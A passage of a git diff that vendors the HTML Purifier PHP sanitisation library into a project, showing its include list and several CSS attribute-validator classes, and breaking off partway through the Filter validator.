'/HTMLPurifier/AttrDef/CSS/Composite.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/DenyElementDecorator.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Filter.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Font.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/FontFamily.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Ident.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/ImportantDecorator.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Length.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/ListStyle.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Multiple.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Percentage.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/TextDecoration.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/URI.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Bool.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Nmtokens.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Class.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Color.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/HTML/FrameTarget.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/HTML/ID.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Pixels.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Length.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/HTML/LinkTypes.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/HTML/MultiLength.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/URI/Email.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/URI/Host.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/URI/IPv4.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/URI/IPv6.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/Background.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/BdoDir.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/BgColor.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/BoolToCSS.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/Border.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/EnumToCSS.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/ImgRequired.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/ImgSpace.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/Input.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/Lang.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/Length.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/Name.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/NameSync.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/Nofollow.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/SafeEmbed.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/SafeObject.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/SafeParam.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/ScriptRequired.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/TargetBlank.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform/Textarea.php'; +require_once $__dir . '/HTMLPurifier/ChildDef/Chameleon.php'; +require_once $__dir . '/HTMLPurifier/ChildDef/Custom.php'; +require_once $__dir . '/HTMLPurifier/ChildDef/Empty.php'; +require_once $__dir . '/HTMLPurifier/ChildDef/List.php'; +require_once $__dir . '/HTMLPurifier/ChildDef/Required.php'; +require_once $__dir . '/HTMLPurifier/ChildDef/Optional.php'; +require_once $__dir . '/HTMLPurifier/ChildDef/StrictBlockquote.php'; +require_once $__dir . '/HTMLPurifier/ChildDef/Table.php'; +require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator.php'; +require_once $__dir . '/HTMLPurifier/DefinitionCache/Null.php'; +require_once $__dir . '/HTMLPurifier/DefinitionCache/Serializer.php'; +require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator/Cleanup.php'; +require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator/Memory.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Bdo.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/CommonAttributes.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Edit.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Forms.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Hypertext.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Iframe.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Image.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Legacy.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/List.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Name.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Nofollow.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/NonXMLCommonAttributes.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Object.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Presentation.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Proprietary.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Ruby.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/SafeEmbed.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/SafeObject.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Scripting.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/StyleAttribute.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Tables.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Target.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/TargetBlank.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Text.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/XMLCommonAttributes.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Name.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Proprietary.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Strict.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Transitional.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/XHTML.php'; +require_once $__dir . '/HTMLPurifier/Injector/AutoParagraph.php'; +require_once $__dir . '/HTMLPurifier/Injector/DisplayLinkURI.php'; +require_once $__dir . '/HTMLPurifier/Injector/Linkify.php'; +require_once $__dir . '/HTMLPurifier/Injector/PurifierLinkify.php'; +require_once $__dir . '/HTMLPurifier/Injector/RemoveEmpty.php'; +require_once $__dir . '/HTMLPurifier/Injector/RemoveSpansWithoutAttributes.php'; +require_once $__dir . '/HTMLPurifier/Injector/SafeObject.php'; +require_once $__dir . '/HTMLPurifier/Lexer/DOMLex.php'; +require_once $__dir . '/HTMLPurifier/Lexer/DirectLex.php'; +require_once $__dir . '/HTMLPurifier/Strategy/Composite.php'; +require_once $__dir . '/HTMLPurifier/Strategy/Core.php'; +require_once $__dir . '/HTMLPurifier/Strategy/FixNesting.php'; +require_once $__dir . '/HTMLPurifier/Strategy/MakeWellFormed.php'; +require_once $__dir . '/HTMLPurifier/Strategy/RemoveForeignElements.php'; +require_once $__dir . '/HTMLPurifier/Strategy/ValidateAttributes.php'; +require_once $__dir . '/HTMLPurifier/TagTransform/Font.php'; +require_once $__dir . '/HTMLPurifier/TagTransform/Simple.php'; +require_once $__dir . '/HTMLPurifier/Token/Comment.php'; +require_once $__dir . '/HTMLPurifier/Token/Tag.php'; +require_once $__dir . '/HTMLPurifier/Token/Empty.php'; +require_once $__dir . '/HTMLPurifier/Token/End.php'; +require_once $__dir . '/HTMLPurifier/Token/Start.php'; +require_once $__dir . '/HTMLPurifier/Token/Text.php'; +require_once $__dir . '/HTMLPurifier/URIFilter/DisableExternal.php'; +require_once $__dir . '/HTMLPurifier/URIFilter/DisableExternalResources.php'; +require_once $__dir . '/HTMLPurifier/URIFilter/DisableResources.php'; +require_once $__dir . '/HTMLPurifier/URIFilter/HostBlacklist.php'; +require_once $__dir . '/HTMLPurifier/URIFilter/MakeAbsolute.php'; +require_once $__dir . '/HTMLPurifier/URIFilter/Munge.php'; +require_once $__dir . '/HTMLPurifier/URIFilter/SafeIframe.php'; +require_once $__dir . '/HTMLPurifier/URIScheme/data.php'; +require_once $__dir . '/HTMLPurifier/URIScheme/file.php'; +require_once $__dir . '/HTMLPurifier/URIScheme/ftp.php'; +require_once $__dir . '/HTMLPurifier/URIScheme/http.php'; +require_once $__dir . '/HTMLPurifier/URIScheme/https.php'; +require_once $__dir . '/HTMLPurifier/URIScheme/mailto.php'; +require_once $__dir . '/HTMLPurifier/URIScheme/news.php'; +require_once $__dir . '/HTMLPurifier/URIScheme/nntp.php'; +require_once $__dir . '/HTMLPurifier/VarParser/Flexible.php'; +require_once $__dir . '/HTMLPurifier/VarParser/Native.php'; diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrCollections.php b/lib/htmlpurifier/library/HTMLPurifier/AttrCollections.php new file mode 100644 index 000000000..555b86d04 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrCollections.php @@ -0,0 +1,128 @@ +<?php + +/** + * Defines common attribute collections that modules reference + */ + +class HTMLPurifier_AttrCollections +{ + + /** + * Associative array of attribute collections, indexed by name + */ + public $info = array(); + + /** + * Performs all expansions on internal data for use by other inclusions + * It also collects all attribute collection extensions from + * modules + * @param $attr_types HTMLPurifier_AttrTypes instance + * @param $modules Hash array of HTMLPurifier_HTMLModule members + */ + public function __construct($attr_types, $modules) { + // load extensions from the modules + foreach ($modules as $module) { + foreach ($module->attr_collections as $coll_i => $coll) { + if (!isset($this->info[$coll_i])) { + $this->info[$coll_i] = array(); + } + foreach ($coll as $attr_i => $attr) { + if ($attr_i === 0 && isset($this->info[$coll_i][$attr_i])) { + // merge in includes + $this->info[$coll_i][$attr_i] = array_merge( + $this->info[$coll_i][$attr_i], $attr); + continue; + } + $this->info[$coll_i][$attr_i] = $attr; + } + } + } + // perform internal expansions and inclusions + foreach ($this->info as $name => $attr) { + // merge attribute collections that include others + $this->performInclusions($this->info[$name]); + // replace string identifiers with actual attribute objects + $this->expandIdentifiers($this->info[$name], $attr_types); + } + } + + /** + * Takes a reference to an attribute associative array and performs + * all inclusions specified by the zero index. + * @param &$attr Reference to attribute array + */ + public function performInclusions(&$attr) { + if (!isset($attr[0])) return; + $merge = $attr[0]; + $seen = array(); // recursion guard + // loop through all the inclusions + for ($i = 0; isset($merge[$i]); $i++) { + if (isset($seen[$merge[$i]])) continue; + $seen[$merge[$i]] = true; + // foreach attribute of the inclusion, copy it over + if (!isset($this->info[$merge[$i]])) continue; + foreach ($this->info[$merge[$i]] as $key => $value) { + if (isset($attr[$key])) continue; // also catches more inclusions + $attr[$key] = $value; + } + if (isset($this->info[$merge[$i]][0])) { + // recursion + $merge = array_merge($merge, $this->info[$merge[$i]][0]); + } + } + unset($attr[0]); + } + + /** + * Expands all string identifiers in an attribute array by replacing + * them with the appropriate values inside HTMLPurifier_AttrTypes + * @param &$attr Reference to attribute array + * @param $attr_types HTMLPurifier_AttrTypes instance + */ + public function expandIdentifiers(&$attr, $attr_types) { + + // because foreach will process new elements we add, make sure we + // skip duplicates + $processed = array(); + + foreach ($attr as $def_i => $def) { + // skip inclusions + if ($def_i === 0) continue; + + if (isset($processed[$def_i])) continue; + + // determine whether or not attribute is required + if ($required = (strpos($def_i, '*') !== false)) { + // rename the definition + unset($attr[$def_i]); + $def_i = trim($def_i, '*'); + $attr[$def_i] = $def; + } + + $processed[$def_i] = true; + + // if we've already got a literal object, move on + if (is_object($def)) { + // preserve previous required + $attr[$def_i]->required = ($required || $attr[$def_i]->required); + continue; + } + + if ($def === false) { + unset($attr[$def_i]); + continue; + } + + if ($t = $attr_types->get($def)) { + $attr[$def_i] = $t; + $attr[$def_i]->required = $required; + } else { + unset($attr[$def_i]); + } + } + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef.php new file mode 100644 index 000000000..b2e4f36c5 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef.php @@ -0,0 +1,123 @@ +<?php + +/** + * Base class for all validating attribute definitions. + * + * This family of classes forms the core for not only HTML attribute validation, + * but also any sort of string that needs to be validated or cleaned (which + * means CSS properties and composite definitions are defined here too). + * Besides defining (through code) what precisely makes the string valid, + * subclasses are also responsible for cleaning the code if possible. + */ + +abstract class HTMLPurifier_AttrDef +{ + + /** + * Tells us whether or not an HTML attribute is minimized. Has no + * meaning in other contexts. + */ + public $minimized = false; + + /** + * Tells us whether or not an HTML attribute is required. Has no + * meaning in other contexts + */ + public $required = false; + + /** + * Validates and cleans passed string according to a definition. + * + * @param $string String to be validated and cleaned. + * @param $config Mandatory HTMLPurifier_Config object. + * @param $context Mandatory HTMLPurifier_AttrContext object. + */ + abstract public function validate($string, $config, $context); + + /** + * Convenience method that parses a string as if it were CDATA. + * + * This method process a string in the manner specified at + * <http://www.w3.org/TR/html4/types.html#h-6.2> by removing + * leading and trailing whitespace, ignoring line feeds, and replacing + * carriage returns and tabs with spaces. While most useful for HTML + * attributes specified as CDATA, it can also be applied to most CSS + * values. + * + * @note This method is not entirely standards compliant, as trim() removes + * more types of whitespace than specified in the spec. In practice, + * this is rarely a problem, as those extra characters usually have + * already been removed by HTMLPurifier_Encoder. + * + * @warning This processing is inconsistent with XML's whitespace handling + * as specified by section 3.3.3 and referenced XHTML 1.0 section + * 4.7. However, note that we are NOT necessarily + * parsing XML, thus, this behavior may still be correct. We + * assume that newlines have been normalized. + */ + public function parseCDATA($string) { + $string = trim($string); + $string = str_replace(array("\n", "\t", "\r"), ' ', $string); + return $string; + } + + /** + * Factory method for creating this class from a string. + * @param $string String construction info + * @return Created AttrDef object corresponding to $string + */ + public function make($string) { + // default implementation, return a flyweight of this object. + // If $string has an effect on the returned object (i.e. you + // need to overload this method), it is best + // to clone or instantiate new copies. (Instantiation is safer.) + return $this; + } + + /** + * Removes spaces from rgb(0, 0, 0) so that shorthand CSS properties work + * properly. THIS IS A HACK! + */ + protected function mungeRgb($string) { + return preg_replace('/rgb\((\d+)\s*,\s*(\d+)\s*,\s*(\d+)\)/', 'rgb(\1,\2,\3)', $string); + } + + /** + * Parses a possibly escaped CSS string and returns the "pure" + * version of it. + */ + protected function expandCSSEscape($string) { + // flexibly parse it + $ret = ''; + for ($i = 0, $c = strlen($string); $i < $c; $i++) { + if ($string[$i] === '\\') { + $i++; + if ($i >= $c) { + $ret .= '\\'; + break; + } + if (ctype_xdigit($string[$i])) { + $code = $string[$i]; + for ($a = 1, $i++; $i < $c && $a < 6; $i++, $a++) { + if (!ctype_xdigit($string[$i])) break; + $code .= $string[$i]; + } + // We have to be extremely careful when adding + // new characters, to make sure we're not breaking + // the encoding. + $char = HTMLPurifier_Encoder::unichr(hexdec($code)); + if (HTMLPurifier_Encoder::cleanUTF8($char) === '') continue; + $ret .= $char; + if ($i < $c && trim($string[$i]) !== '') $i--; + continue; + } + if ($string[$i] === "\n") continue; + } + $ret .= $string[$i]; + } + return $ret; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS.php new file mode 100644 index 000000000..953e70675 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS.php @@ -0,0 +1,87 @@ +<?php + +/** + * Validates the HTML attribute style, otherwise known as CSS. + * @note We don't implement the whole CSS specification, so it might be + * difficult to reuse this component in the context of validating + * actual stylesheet declarations. + * @note If we were really serious about validating the CSS, we would + * tokenize the styles and then parse the tokens. Obviously, we + * are not doing that. Doing that could seriously harm performance, + * but would make these components a lot more viable for a CSS + * filtering solution. + */ +class HTMLPurifier_AttrDef_CSS extends HTMLPurifier_AttrDef +{ + + public function validate($css, $config, $context) { + + $css = $this->parseCDATA($css); + + $definition = $config->getCSSDefinition(); + + // we're going to break the spec and explode by semicolons. + // This is because semicolon rarely appears in escaped form + // Doing this is generally flaky but fast + // IT MIGHT APPEAR IN URIs, see HTMLPurifier_AttrDef_CSSURI + // for details + + $declarations = explode(';', $css); + $propvalues = array(); + + /** + * Name of the current CSS property being validated. + */ + $property = false; + $context->register('CurrentCSSProperty', $property); + + foreach ($declarations as $declaration) { + if (!$declaration) continue; + if (!strpos($declaration, ':')) continue; + list($property, $value) = explode(':', $declaration, 2); + $property = trim($property); + $value = trim($value); + $ok = false; + do { + if (isset($definition->info[$property])) { + $ok = true; + break; + } + if (ctype_lower($property)) break; + $property = strtolower($property); + if (isset($definition->info[$property])) { + $ok = true; + break; + } + } while(0); + if (!$ok) continue; + // inefficient call, since the validator will do this again + if (strtolower(trim($value)) !== 'inherit') { + // inherit works for everything (but only on the base property) + $result = $definition->info[$property]->validate( + $value, $config, $context ); + } else { + $result = 'inherit'; + } + if ($result === false) continue; + $propvalues[$property] = $result; + } + + $context->destroy('CurrentCSSProperty'); + + // procedure does not write the new CSS simultaneously, so it's + // slightly inefficient, but it's the only way of getting rid of + // duplicates. Perhaps config to optimize it, but not now. + + $new_declarations = ''; + foreach ($propvalues as $prop => $value) { + $new_declarations .= "$prop:$value;"; + } + + return $new_declarations ? $new_declarations : false; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/AlphaValue.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/AlphaValue.php new file mode 100644 index 000000000..292c040d4 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/AlphaValue.php @@ -0,0 +1,21 @@ +<?php + +class HTMLPurifier_AttrDef_CSS_AlphaValue extends HTMLPurifier_AttrDef_CSS_Number +{ + + public function __construct() { + parent::__construct(false); // opacity is non-negative, but we will clamp it + } + + public function validate($number, $config, $context) { + $result = parent::validate($number, $config, $context); + if ($result === false) return $result; + $float = (float) $result; + if ($float < 0.0) $result = '0'; + if ($float > 1.0) $result = '1'; + return $result; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Background.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Background.php new file mode 100644 index 000000000..3a3d20cd6 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Background.php @@ -0,0 +1,87 @@ +<?php + +/** + * Validates shorthand CSS property background. + * @warning Does not support url tokens that have internal spaces. + */ +class HTMLPurifier_AttrDef_CSS_Background extends HTMLPurifier_AttrDef +{ + + /** + * Local copy of component validators. + * @note See HTMLPurifier_AttrDef_Font::$info for a similar impl. + */ + protected $info; + + public function __construct($config) { + $def = $config->getCSSDefinition(); + $this->info['background-color'] = $def->info['background-color']; + $this->info['background-image'] = $def->info['background-image']; + $this->info['background-repeat'] = $def->info['background-repeat']; + $this->info['background-attachment'] = $def->info['background-attachment']; + $this->info['background-position'] = $def->info['background-position']; + } + + public function validate($string, $config, $context) { + + // regular pre-processing + $string = $this->parseCDATA($string); + if ($string === '') return false; + + // munge rgb() decl if necessary + $string = $this->mungeRgb($string); + + // assumes URI doesn't have spaces in it + $bits = explode(' ', strtolower($string)); // bits to process + + $caught = array(); + $caught['color'] = false; + $caught['image'] = false; + $caught['repeat'] = false; + $caught['attachment'] = false; + $caught['position'] = false; + + $i = 0; // number of catches + $none = false; + + foreach ($bits as $bit) { + if ($bit === '') continue; + foreach ($caught as $key => $status) { + if ($key != 'position') { + if ($status !== false) continue; + $r = $this->info['background-' . $key]->validate($bit, $config, $context); + } else { + $r = $bit; + } + if ($r === false) continue; + if ($key == 'position') { + if ($caught[$key] === false) $caught[$key] = ''; + $caught[$key] .= $r . ' '; + } else { + $caught[$key] = $r; + } + $i++; + break; + } + } + + if (!$i) return false; + if ($caught['position'] !== false) { + $caught['position'] = $this->info['background-position']-> + validate($caught['position'], $config, $context); + } + + $ret = array(); + foreach ($caught as $value) { + if ($value === false) continue; + $ret[] = $value; + } + + if (empty($ret)) return false; + return implode(' ', $ret); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/BackgroundPosition.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/BackgroundPosition.php new file mode 100644 index 000000000..fae82eaec --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/BackgroundPosition.php @@ -0,0 +1,133 @@ +<?php + +/* W3C says: + [ // adjective and number must be in correct order, even if + // you could switch them without introducing ambiguity. + // some browsers support that syntax + [ + <percentage> | <length> | left | center | right + ] + [ + <percentage> | <length> | top | center | bottom + ]? + ] | + [ // this signifies that the vertical and horizontal adjectives + // can be arbitrarily ordered, however, there can only be two, + // one of each, or none at all + [ + left | center | right + ] || + [ + top | center | bottom + ] + ] + top, left = 0% + center, (none) = 50% + bottom, right = 100% +*/ + +/* QuirksMode says: + keyword + length/percentage must be ordered correctly, as per W3C + + Internet Explorer and Opera, however, support arbitrary ordering. We + should fix it up. + + Minor issue though, not strictly necessary. +*/ + +// control freaks may appreciate the ability to convert these to +// percentages or something, but it's not necessary + +/** + * Validates the value of background-position. + */ +class HTMLPurifier_AttrDef_CSS_BackgroundPosition extends HTMLPurifier_AttrDef +{ + + protected $length; + protected $percentage; + + public function __construct() { + $this->length = new HTMLPurifier_AttrDef_CSS_Length(); + $this->percentage = new HTMLPurifier_AttrDef_CSS_Percentage(); + } + + public function validate($string, $config, $context) { + $string = $this->parseCDATA($string); + $bits = explode(' ', $string); + + $keywords = array(); + $keywords['h'] = false; // left, right + $keywords['v'] = false; // top, bottom + $keywords['ch'] = false; // center (first word) + $keywords['cv'] = false; // center (second word) + $measures = array(); + + $i = 0; + + $lookup = array( + 'top' => 'v', + 'bottom' => 'v', + 'left' => 'h', + 'right' => 'h', + 'center' => 'c' + ); + + foreach ($bits as $bit) { + if ($bit === '') continue; + + // test for keyword + $lbit = ctype_lower($bit) ? $bit : strtolower($bit); + if (isset($lookup[$lbit])) { + $status = $lookup[$lbit]; + if ($status == 'c') { + if ($i == 0) { + $status = 'ch'; + } else { + $status = 'cv'; + } + } + $keywords[$status] = $lbit; + $i++; + } + + // test for length + $r = $this->length->validate($bit, $config, $context); + if ($r !== false) { + $measures[] = $r; + $i++; + } + + // test for percentage + $r = $this->percentage->validate($bit, $config, $context); + if ($r !== false) { + $measures[] = $r; + $i++; + } + + } + + if (!$i) return false; // no valid values were caught + + $ret = array(); + + // first keyword + if ($keywords['h']) $ret[] = $keywords['h']; + elseif ($keywords['ch']) { + $ret[] = $keywords['ch']; + $keywords['cv'] = false; // prevent re-use: center = center center + } + elseif (count($measures)) $ret[] = array_shift($measures); + + if ($keywords['v']) $ret[] = $keywords['v']; + elseif ($keywords['cv']) $ret[] = $keywords['cv']; + elseif (count($measures)) $ret[] = array_shift($measures); + + if (empty($ret)) return false; + return implode(' ', $ret); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Border.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Border.php new file mode 100644 index 000000000..42a1d1b4a --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Border.php @@ -0,0 +1,43 @@ +<?php + +/** + * Validates the border property as defined by CSS. + */ +class HTMLPurifier_AttrDef_CSS_Border extends HTMLPurifier_AttrDef +{ + + /** + * Local copy of properties this property is shorthand for. + */ + protected $info = array(); + + public function __construct($config) { + $def = $config->getCSSDefinition(); + $this->info['border-width'] = $def->info['border-width']; + $this->info['border-style'] = $def->info['border-style']; + $this->info['border-top-color'] = $def->info['border-top-color']; + } + + public function validate($string, $config, $context) { + $string = $this->parseCDATA($string); + $string = $this->mungeRgb($string); + $bits = explode(' ', $string); + $done = array(); // segments we've finished + $ret = ''; // return value + foreach ($bits as $bit) { + foreach ($this->info as $propname => $validator) { + if (isset($done[$propname])) continue; + $r = $validator->validate($bit, $config, $context); + if ($r !== false) { + $ret .= $r . ' '; + $done[$propname] = true; + break; + } + } + } + return rtrim($ret); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Color.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Color.php new file mode 100644 index 000000000..07f95a671 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Color.php @@ -0,0 +1,78 @@ +<?php + +/** + * Validates Color as defined by CSS. + */ +class HTMLPurifier_AttrDef_CSS_Color extends HTMLPurifier_AttrDef +{ + + public function validate($color, $config, $context) { + + static $colors = null; + if ($colors === null) $colors = $config->get('Core.ColorKeywords'); + + $color = trim($color); + if ($color === '') return false; + + $lower = strtolower($color); + if (isset($colors[$lower])) return $colors[$lower]; + + if (strpos($color, 'rgb(') !== false) { + // rgb literal handling + $length = strlen($color); + if (strpos($color, ')') !== $length - 1) return false; + $triad = substr($color, 4, $length - 4 - 1); + $parts = explode(',', $triad); + if (count($parts) !== 3) return false; + $type = false; // to ensure that they're all the same type + $new_parts = array(); + foreach ($parts as $part) { + $part = trim($part); + if ($part === '') return false; + $length = strlen($part); + if ($part[$length - 1] === '%') { + // handle percents + if (!$type) { + $type = 'percentage'; + } elseif ($type !== 'percentage') { + return false; + } + $num = (float) substr($part, 0, $length - 1); + if ($num < 0) $num = 0; + if ($num > 100) $num = 100; + $new_parts[] = "$num%"; + } else { + // handle integers + if (!$type) { + $type = 'integer'; + } elseif ($type !== 'integer') { + return false; + } + $num = (int) $part; + if ($num < 0) $num = 0; + if ($num > 255) $num = 255; + $new_parts[] = (string) $num; + } + } + $new_triad = implode(',', $new_parts); + $color = "rgb($new_triad)"; + } else { + // hexadecimal handling + if ($color[0] === '#') { + $hex = substr($color, 1); + } else { + $hex = $color; + $color = '#' . $color; + } + $length = strlen($hex); + if ($length !== 3 && $length !== 6) return false; + if (!ctype_xdigit($hex)) return false; + } + + return $color; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Composite.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Composite.php new file mode 100644 index 000000000..de1289cba --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Composite.php @@ -0,0 +1,38 @@ +<?php + +/** + * Allows multiple validators to attempt to validate attribute. + * + * Composite is just what it sounds like: a composite of many validators. + * This means that multiple HTMLPurifier_AttrDef objects will have a whack + * at the string. If one of them passes, that's what is returned. This is + * especially useful for CSS values, which often are a choice between + * an enumerated set of predefined values or a flexible data type. + */ +class HTMLPurifier_AttrDef_CSS_Composite extends HTMLPurifier_AttrDef +{ + + /** + * List of HTMLPurifier_AttrDef objects that may process strings + * @todo Make protected + */ + public $defs; + + /** + * @param $defs List of HTMLPurifier_AttrDef objects + */ + public function __construct($defs) { + $this->defs = $defs; + } + + public function validate($string, $config, $context) { + foreach ($this->defs as $i => $def) { + $result = $this->defs[$i]->validate($string, $config, $context); + if ($result !== false) return $result; + } + return false; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/DenyElementDecorator.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/DenyElementDecorator.php new file mode 100644 index 000000000..6599c5b2d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/DenyElementDecorator.php @@ -0,0 +1,28 @@ +<?php + +/** + * Decorator which enables CSS properties to be disabled for specific elements. + */ +class HTMLPurifier_AttrDef_CSS_DenyElementDecorator extends HTMLPurifier_AttrDef +{ + public $def, $element; + + /** + * @param $def Definition to wrap + * @param $element Element to deny + */ + public function __construct($def, $element) { + $this->def = $def; + $this->element = $element; + } + /** + * Checks if CurrentToken is set and equal to $this->element + */ + public function validate($string, $config, $context) { + $token = $context->get('CurrentToken', true); + if ($token && $token->name == $this->element) return false; + return $this->def->validate($string, $config, $context); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Filter.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Filter.php new file mode 100644 index 000000000..147894b86 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Filter.php @@ -0,0 +1,54 @@ +<?php + +/** + * Microsoft's proprietary filter: CSS property + * @note Currently supports the alpha filter. In the future, this will + * probably need an extensible framework + */ +class HTMLPurifier_AttrDef_CSS_Filter extends HTMLPurifier_AttrDef +{ + + protected $intValidator; + + public function __construct() { + $this->intValidator = new HTMLPurifier_AttrDef_Integer(); + } + + public function validate($value, $config, $context) { + $value = $this->parseCDATA($value); + if ($value === 'none') return $value; + // if we looped this we could support multiple filters + $function_length = strcspn($value, '('); + $function = trim(substr($value, 0, $function_length)); + if ($function !== 'alpha' && + $function !== 'Alpha' && + $function !== 'progid:DXImageTransform.Microsoft.Alpha' + ) return false; + $cursor = $function_length + 1; + 